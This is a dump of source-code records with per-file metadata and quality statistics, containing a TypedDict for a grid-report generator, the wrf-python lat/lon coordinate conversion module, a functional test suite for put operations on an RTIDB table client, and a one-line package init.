| 0.895652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
7cd8127a5b908dc025471127ba2db5ac904b5960
| 215
|
py
|
Python
|
src/typeDefs/stationwiseVdiData.py
|
rohit98077/wrldc_mis_weekly_report_generator
|
13969db6bf6359e1bd9663d289f903c22d8b7e61
|
[
"MIT"
] | null | null | null |
src/typeDefs/stationwiseVdiData.py
|
rohit98077/wrldc_mis_weekly_report_generator
|
13969db6bf6359e1bd9663d289f903c22d8b7e61
|
[
"MIT"
] | 7
|
2020-09-18T11:37:36.000Z
|
2020-09-26T12:29:30.000Z
|
src/typeDefs/stationwiseVdiData.py
|
rohit98077/wrldc_mis_weekly_report_generator
|
13969db6bf6359e1bd9663d289f903c22d8b7e61
|
[
"MIT"
] | 3
|
2020-09-19T07:28:40.000Z
|
2020-09-25T05:49:15.000Z
|
from typing import TypedDict, List
from src.typeDefs.stationVdiProfile import IStationVdiProfile
class IStationwiseVdi(TypedDict):
vdi400Rows: List[IStationVdiProfile]
vdi765Rows: List[IStationVdiProfile]
| 26.875
| 61
| 0.827907
| 20
| 215
| 8.9
| 0.65
| 0.247191
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031579
| 0.116279
| 215
| 7
| 62
| 30.714286
| 0.905263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6b1d2da1bd9020ad5665f534d6082fe7558c8587
| 28,491
|
py
|
Python
|
src/wrf/g_latlon.py
|
khallock/wrf-python
|
9c5825c101722e7eddece2ca13cc8e9d9f96a21e
|
[
"Apache-2.0"
] | 1
|
2018-10-30T18:06:26.000Z
|
2018-10-30T18:06:26.000Z
|
src/wrf/g_latlon.py
|
mostamndi/wrf-python
|
3806bcdd01b31fa67da980eafefa0d1245faf6a6
|
[
"Apache-2.0"
] | null | null | null |
src/wrf/g_latlon.py
|
mostamndi/wrf-python
|
3806bcdd01b31fa67da980eafefa0d1245faf6a6
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import (absolute_import, division, print_function)
from collections import OrderedDict
import numpy as np
from .util import extract_vars, get_id, get_iterable, is_mapping, to_np
from .py3compat import viewkeys
from .latlonutils import _lat_varname, _lon_varname, _ll_to_xy, _xy_to_ll
from .metadecorators import set_latlon_metadata
from .config import xarray_enabled
if xarray_enabled():
from xarray import DataArray
def get_lat(wrfin, timeidx=0, method="cat", squeeze=True,
cache=None, meta=True, _key=None,
stagger=None):
"""Return the two dimensional latitude coordinate variable.
This functions extracts the necessary variables from the NetCDF file
object in order to perform the calculation.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
method (:obj:`str`, optional): The aggregation method to use for
sequences. Must be either 'cat' or 'join'.
'cat' combines the data along the Time dimension.
'join' creates a new dimension for the file index.
The default is 'cat'.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
cache (:obj:`dict`, optional): A dictionary of (varname, ndarray)
that can be used to supply pre-extracted NetCDF variables to the
computational routines. It is primarily used for internal
purposes, but can also be used to improve performance by
eliminating the need to repeatedly extract the same variables
used in multiple diagnostics calculations, particularly when using
large sequences of files.
Default is None.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
_key (:obj:`int`, optional): A caching key. This is used for internal
purposes only. Default is None.
stagger (:obj:`str`): By default, the latitude is returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
two dimensional latitude coordinate variable.
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
varname = _lat_varname(wrfin, stagger)
lat_var = extract_vars(wrfin, timeidx, varname, method, squeeze, cache,
meta, _key)
return lat_var[varname]
def get_lon(wrfin, timeidx=0, method="cat", squeeze=True,
cache=None, meta=True, _key=None,
stagger=None):
"""Return the two dimensional longitude coordinate variable.
This functions extracts the necessary variables from the NetCDF file
object in order to perform the calculation.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
method (:obj:`str`, optional): The aggregation method to use for
sequences. Must be either 'cat' or 'join'.
'cat' combines the data along the Time dimension.
'join' creates a new dimension for the file index.
The default is 'cat'.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
cache (:obj:`dict`, optional): A dictionary of (varname, ndarray)
that can be used to supply pre-extracted NetCDF variables to the
computational routines. It is primarily used for internal
purposes, but can also be used to improve performance by
eliminating the need to repeatedly extract the same variables
used in multiple diagnostics calculations, particularly when using
large sequences of files.
Default is None.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
_key (:obj:`int`, optional): A caching key. This is used for internal
purposes only. Default is None.
stagger (:obj:`str`): By default, the longitude is returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
two dimensional longitude coordinate variable.
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
varname = _lon_varname(wrfin, stagger)
lon_var = extract_vars(wrfin, timeidx, varname, method, squeeze, cache,
meta, _key)
return lon_var[varname]
def _llxy_mapping(wrfin, x_or_lat, y_or_lon, func, timeidx, stagger,
squeeze, meta, as_int=None):
"""Return the x,y/lat,lon coordinates for a dictionary input.
The leftmost dimension(s) for the result is:
- return_val[key,...,0,...] will contain the x/lat values.
- return_val[key,...,1,...] will contain the y/lon values.
Nested dictionaries are allowed.
Args:
wrfin (:obj:`dict`): A mapping of key name to a WRF NetCDF file object
or sequence of WRF NetCDF file objects.
x_or_lat (:obj:`float` or sequence): A single latitude/x value or a
sequence of latitude/x values to be converted.
y_or_lon (:obj:`float` or sequence): A single longitude/y value or a
sequence of longitude/y values to be converted.
func (function): Either the xy_to_ll or ll_to_xy function.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
stagger (:obj:`str`): By default, the values are returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
as_int (:obj:`bool`, optional): Set to True to return the x,y values as
:obj:`int`, otherwise they will be returned as :obj:`float`. This
is only used when *func* is ll_to_xy.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
lat,lon/x,y coordinate value(s) whose leftmost dimensions are the
dictionary keys, followed by a dimension of size
2 (0=X, 1=Y)/(0=lat, 1=lon).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
keynames = []
# This might not work once mapping iterators are implemented
numkeys = len(wrfin)
key_iter = iter(viewkeys(wrfin))
first_key = next(key_iter)
keynames.append(first_key)
first_args = [wrfin[first_key], x_or_lat, y_or_lon, timeidx, squeeze,
meta, stagger]
if as_int is not None:
first_args.append(as_int)
first_array = func(*first_args)
# Create the output data numpy array based on the first array
outdims = [numkeys]
outdims += first_array.shape
outdata = np.empty(outdims, first_array.dtype)
outdata[0,:] = first_array[:]
idx = 1
while True:
try:
key = next(key_iter)
except StopIteration:
break
else:
keynames.append(key)
args = [wrfin[first_key], x_or_lat, y_or_lon, timeidx, squeeze,
meta, stagger]
if as_int is not None:
args.append(as_int)
result_array = func(*args)
if outdata.shape[1:] != result_array.shape:
raise ValueError("data sequences must have the "
"same size for all dictionary keys")
outdata[idx,:] = to_np(result_array)[:]
idx += 1
if xarray_enabled() and meta:
outname = str(first_array.name)
# Note: assumes that all entries in dict have same coords
outcoords = OrderedDict(first_array.coords)
# First find and store all the existing key coord names/values
# This is applicable only if there are nested dictionaries.
key_coordnames = []
coord_vals = []
existing_cnt = 0
while True:
key_coord_name = "key_{}".format(existing_cnt)
if key_coord_name not in first_array.dims:
break
key_coordnames.append(key_coord_name)
coord_vals.append(to_np(first_array.coords[key_coord_name]))
existing_cnt += 1
# Now add the key coord name and values for THIS dictionary.
# Put the new key_n name at the bottom, but the new values will
# be at the top to be associated with key_0 (left most). This
# effectively shifts the existing 'key_n' coordinate values to the
# right one dimension so *this* dicionary's key coordinate values
# are at 'key_0'.
key_coordnames.append(key_coord_name)
coord_vals.insert(0, keynames)
# make it so that key_0 is leftmost
outdims = key_coordnames + list(first_array.dims[existing_cnt:])
# Create the new 'key_n', value pairs
for coordname, coordval in zip(key_coordnames, coord_vals):
outcoords[coordname] = coordval
outattrs = OrderedDict(first_array.attrs)
outarr = DataArray(outdata, name=outname, coords=outcoords,
dims=outdims, attrs=outattrs)
else:
outarr = outdata
return outarr
@set_latlon_metadata(xy=True)
def ll_to_xy(wrfin, latitude, longitude, timeidx=0,
squeeze=True, meta=True, stagger=None, as_int=True):
"""Return the x,y coordinates for a specified latitude and longitude.
The *latitude* and *longitude* arguments can be a single value or a
sequence of values.
The leftmost dimension of the returned array represents two different
quantities:
- return_val[0,...] will contain the X (west_east) values.
- return_val[1,...] will contain the Y (south_north) values.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
latitude (:obj:`float` or sequence): A single latitude or a sequence
of latitude values to be converted.
longitude (:obj:`float` or sequence): A single longitude or a sequence
of latitude values to be converted.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
stagger (:obj:`str`): By default, the latitude is returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
as_int (:obj:`bool`): Set to False to return the x,y values as
:obj:`float`, otherwise they will be returned as :obj:`int`.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
x,y coordinate value(s) whose leftmost dimension is 2 (0=X, 1=Y).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
if is_mapping(wrfin):
return _llxy_mapping(wrfin, latitude, longitude, ll_to_xy,
timeidx, stagger, squeeze, meta, as_int)
_key = get_id(wrfin)
_wrfin = get_iterable(wrfin)
return _ll_to_xy(latitude, longitude, _wrfin, timeidx, stagger, "cat",
squeeze, None, _key, as_int, **{})
@set_latlon_metadata(xy=True)
def ll_to_xy_proj(latitude, longitude, meta=True, squeeze=True, as_int=True,
map_proj=None, truelat1=None, truelat2=None, stand_lon=None,
ref_lat=None, ref_lon=None, pole_lat=None, pole_lon=None,
known_x=None, known_y=None, dx=None, dy=None,
latinc=None, loninc=None):
"""Return the x, y coordinates for a specified latitude and longitude.
The *latitude* and *longitude* arguments can be a single value or a
sequence of values. This version of the ll_to_xy routine allows users
to manually specify projection parameters.
The leftmost dimension of the returned array represents two different
quantities:
- return_val[0,...] will contain the X (west_east) values.
- return_val[1,...] will contain the Y (south_north) values.
Args:
latitude (:obj:`float` or sequence): A single latitude or a sequence
of latitude values to be converted.
longitude (:obj:`float` or sequence): A single longitude or a sequence
of latitude values to be converted.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
as_int (:obj:`bool`): Set to False to return the x,y values as
:obj:`float`, otherwise they will be returned as :obj:`int`.
map_proj (:obj:`int`): Model projection [1=Lambert Conformal,
2=Polar Stereographic, 3=Mercator, 6=Lat-Lon]. Required.
truelat1 (:obj:`float`): True latitude 1. Required for
map_proj = 1, 2, 3 (defaults to 0 otherwise).
truelat2 (:obj:`float`): True latitude 2. Optional for
map_proj = 1 (defaults to 0 otherwise).
stand_lon (:obj:`float`): Standard longitude. Required.
ref_lat (:obj:`float`): A reference latitude. Required.
ref_lon (:obj:`float`): A reference longitude. Required.
known_x (:obj:`float`): The known x-coordinate associated with
*ref_lon*. Required.
known_y (:obj:`float`): The known y-coordinate associated with
*ref_lat*. Required.
pole_lat (:obj:`float`): Pole latitude. Optional for
*map_proj* = 6 (defaults to 90 otherwise).
pole_lon (:obj:`float`): Pole longitude. Optional for
*map_proj* = 6 (defaults to 0 otherwise).
dx (:obj:`float`): The x spacing in meters at the true latitude.
Required for *map_proj* = 1, 2, 3 (defaults to 0 otherwise).
dy (:obj:`float`) - The y spacing in meters at the true latitude.
Required for *map_proj* = 1, 2, 3 (defaults to 0 otherwise).
latinc (:obj:`float`): Required for *map_proj* = 6. Defined as:
.. code-block:: python
latinc = (dy*360.0)/2.0/Constants.PI/Constants.WRF_EARTH_RADIUS
loninc (:obj:`float`): Required for *map_proj* = 6. Defined as:
.. code-block:: python
loninc = (dx*360.0)/2.0/Constants.PI/Constants.WRF_EARTH_RADIUS
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
x,y coordinate value(s) whose leftmost dimension is 2 (0=X, 1=Y).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
loc = locals()
projparams = {name : loc[name] for name in ("map_proj", "truelat1",
"truelat2", "stand_lon", "ref_lat",
"ref_lon", "pole_lat", "pole_lon",
"known_x", "known_y", "dx", "dy",
"latinc", "loninc")}
return _ll_to_xy(latitude, longitude, None, 0, True, "cat", squeeze, None,
None, as_int, **projparams)
@set_latlon_metadata(xy=False)
def xy_to_ll(wrfin, x, y, timeidx=0, squeeze=True, meta=True, stagger=None):
"""Return the latitude and longitude for specified x,y coordinates.
The *x* and *y* arguments can be a single value or a sequence of values.
The leftmost dimension of the returned array represents two different
quantities:
- return_val[0,...] will contain the latitude values.
- return_val[1,...] will contain the longitude values.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
x (:obj:`float` or sequence): A single x-coordinate or a sequence
of x-coordinate values to be converted.
y (:obj:`float` or sequence): A single y-coordinate or a sequence
of y-coordinate values to be converted.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
stagger (:obj:`str`): By default, the latitude is returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
latitude and longitude values whose leftmost dimension is 2
(0=latitude, 1=longitude).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
if is_mapping(wrfin):
return _llxy_mapping(wrfin, x, y, xy_to_ll,
timeidx, stagger, squeeze, meta)
_key = get_id(wrfin)
_wrfin = get_iterable(wrfin)
return _xy_to_ll(x, y, _wrfin, timeidx, stagger, "cat", True, None,
_key, **{})
@set_latlon_metadata(xy=False)
def xy_to_ll_proj(x, y, meta=True, squeeze=True, map_proj=None, truelat1=None,
truelat2=None, stand_lon=None, ref_lat=None, ref_lon=None,
pole_lat=None, pole_lon=None, known_x=None, known_y=None,
dx=None, dy=None, latinc=None, loninc=None):
"""Return the latitude and longitude for the specified x,y coordinates.
The *x* and *y* arguments can be a single value or a
sequence of values. This version of the xy_to_ll routine allows users
to manually specify map projection parameters.
The leftmost dimension of the returned array represents two different
quantities:
- return_val[0,...] will contain the latitude values.
- return_val[1,...] will contain the longitude values.
Args:
x (:obj:`float` or sequence): A single x-coordinate or a sequence
of x-coordinate values to be converted.
y (:obj:`float` or sequence): A single y-coordinate or a sequence
of y-coordinate values to be converted.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
map_proj (:obj:`int`): Model projection [1=Lambert Conformal,
2=Polar Stereographic, 3=Mercator, 6=Lat-Lon]. Required.
truelat1 (:obj:`float`): True latitude 1. Required for
map_proj = 1, 2, 3 (defaults to 0 otherwise).
truelat2 (:obj:`float`): True latitude 2. Optional for
map_proj = 1 (defaults to 0 otherwise).
stand_lon (:obj:`float`): Standard longitude. Required.
ref_lat (:obj:`float`): A reference latitude. Required.
ref_lon (:obj:`float`): A reference longitude. Required.
known_x (:obj:`float`): The known x-coordinate associated with
*ref_lon*. Required.
known_y (:obj:`float`): The known y-coordinate associated with
*ref_lat*. Required.
pole_lat (:obj:`float`): Pole latitude. Optional for
*map_proj* = 6 (defaults to 90 otherwise).
pole_lon (:obj:`float`): Pole longitude. Optional for
*map_proj* = 6 (defaults to 0 otherwise).
dx (:obj:`float`): The x spacing in meters at the true latitude.
Required for *map_proj* = 1, 2, 3 (defaults to 0 otherwise).
dy (:obj:`float`) - The y spacing in meters at the true latitude.
Required for *map_proj* = 1, 2, 3 (defaults to 0 otherwise).
latinc (:obj:`float`): Required for *map_proj* = 6. Defined as:
.. code-block:: python
latinc = (dy*360.0)/2.0/Constants.PI/Constants.WRF_EARTH_RADIUS
loninc (:obj:`float`): Required for *map_proj* = 6. Defined as:
.. code-block:: python
loninc = (dx*360.0)/2.0/Constants.PI/Constants.WRF_EARTH_RADIUS
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
latitude and longitude values whose leftmost dimension is 2
(0=latitude, 1=longitude).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
loc = locals()
projparams = {name : loc[name] for name in ("map_proj", "truelat1",
"truelat2", "stand_lon", "ref_lat",
"ref_lon", "pole_lat", "pole_lon",
"known_x", "known_y", "dx", "dy",
"latinc", "loninc")}
return _xy_to_ll(x, y, None, 0, None, "cat", squeeze, None, None,
**projparams)
| 43.037764
| 80
| 0.585904
| 3,622
| 28,491
| 4.5254
| 0.094423
| 0.019035
| 0.02178
| 0.011714
| 0.831676
| 0.823806
| 0.80776
| 0.796474
| 0.783662
| 0.76786
| 0
| 0.008067
| 0.329999
| 28,491
| 662
| 81
| 43.037764
| 0.850595
| 0.70854
| 0
| 0.3125
| 0
| 0
| 0.042249
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054688
| false
| 0
| 0.070313
| 0
| 0.195313
| 0.007813
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6b360f60238786e6c0ab6fef11d7be1c3634fffe
| 6,362
|
py
|
Python
|
test-common/functiontest/testcase/grp_client/sut_put.py
|
imotai8915/fedb
|
fe0c130f70206325f130f00be6c1483c9c36d113
|
[
"Apache-2.0"
] | 1
|
2021-08-23T12:02:30.000Z
|
2021-08-23T12:02:30.000Z
|
test-common/functiontest/testcase/grp_client/sut_put.py
|
imotai8915/fedb
|
fe0c130f70206325f130f00be6c1483c9c36d113
|
[
"Apache-2.0"
] | null | null | null |
test-common/functiontest/testcase/grp_client/sut_put.py
|
imotai8915/fedb
|
fe0c130f70206325f130f00be6c1483c9c36d113
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from framework.test_suite import TestSuite
from job_helper import JobHelper, RtidbClient
class Put(TestSuite):
"""
put 操作
"""
def setUp(self):
pass
def tearDown(self):
pass
def testPutInvalidTid(self):
"""
不存在的table_id执行put
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table, tid=123)
jobHelper.append(jobHelper.rtidbClient.put, tid=456)
jobHelper.append(jobHelper.rtidbClient.scan, tid=123)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertFalse(retStatus)
self.assertEqual(0, len(jobHelper.scanout_message()))
def testPutDropedTable(self):
"""
已经drop的表执行put
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.drop_table)
jobHelper.append(jobHelper.rtidbClient.put)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertFalse(retStatus)
def testPutTidEmpty(self):
"""
table_id为空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, tid='')
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertFalse(retStatus)
self.assertEqual(0, len(jobHelper.scanout_message()))
def testPutTid0(self):
"""
table_id=0
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table, tid=0)
jobHelper.append(jobHelper.rtidbClient.put, tid=0)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertFalse(retStatus)
def testPutPkEmpty(self):
"""
partition_key为空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, pk='')
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(0, len(jobHelper.scanout_message()))
def testPutTimeStampInvalid(self):
"""
timestamp为空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, time=0)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(0, len(jobHelper.scanout_message()))
def testPutValueInit(self):
"""
value是int数据
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value=123)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run()
self.assertTrue(retStatus)
def testPutValueFloat(self):
"""
value是float数据
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value=1.23)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(1, len(jobHelper.scanout_message()))
def testPutValueBool(self):
"""
value是Bool
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value=True)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(1, len(jobHelper.scanout_message()))
def testPutValueBig(self):
"""
value是1M string
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value='a' * 1024 * 1025)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run()
self.assertTrue(retStatus)
def testPutValueEncode(self):
"""
value是特殊编码数据
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value='ボールト')
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run()
self.assertTrue(retStatus)
def testPutValueEmpty(self):
"""
value是空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value='')
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run()
self.assertTrue(retStatus)
def testPutValueNone(self):
"""
value是空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value=None)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(1, len(jobHelper.scanout_message()))
| 30.7343
| 76
| 0.661584
| 613
| 6,362
| 6.822186
| 0.23491
| 0.196078
| 0.229555
| 0.334768
| 0.751076
| 0.740316
| 0.709469
| 0.709469
| 0.695122
| 0.66308
| 0
| 0.009866
| 0.235303
| 6,362
| 206
| 77
| 30.883495
| 0.849743
| 0.12276
| 0
| 0.660377
| 0
| 0
| 0.000955
| 0
| 0
| 0
| 0
| 0
| 0.188679
| 1
| 0.141509
| false
| 0.018868
| 0.018868
| 0
| 0.169811
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6b3da61ca0ee72ef582af247496e090798287700
| 21
|
py
|
Python
|
pystae/__init__.py
|
mynameisvinn/PyStae
|
3340f001f7c468c23f6b062bcc47987b790c7f8c
|
[
"MIT"
] | null | null | null |
pystae/__init__.py
|
mynameisvinn/PyStae
|
3340f001f7c468c23f6b062bcc47987b790c7f8c
|
[
"MIT"
] | null | null | null |
pystae/__init__.py
|
mynameisvinn/PyStae
|
3340f001f7c468c23f6b062bcc47987b790c7f8c
|
[
"MIT"
] | null | null | null |
from pystae import *
| 21
| 21
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
